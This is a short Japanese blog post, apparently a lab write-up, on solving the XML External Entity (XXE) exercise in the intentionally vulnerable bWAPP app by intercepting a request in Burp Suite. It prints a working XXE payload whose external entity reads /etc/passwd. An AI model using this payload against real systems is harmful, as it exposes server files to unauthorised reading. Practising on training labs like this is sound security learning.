shikata ga nai

Private? There is no such things.

bWAPPのXML External Entity Attacks (XXE)をやってみた

Hello there, ('ω')ノ

 

久しぶりにbWAPPを。

A7 ⇨ XML External Entity Attacks (XXE)を選択して。

Any bugs?ボタンを。

 

f:id:ThisIsOne:20210115111815p:plain

 

Burp Suiteでインターセプトして。

リクエスト内容を確認して。

 

f:id:ThisIsOne:20210115112356p:plain

 

下記の内容に追加・変更してSendすると。

passwdファイルを表示できて。

 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE header [<!ENTITY xxe SYSTEM "///etc/passwd"> ]>
<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

 

f:id:ThisIsOne:20210115113626p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain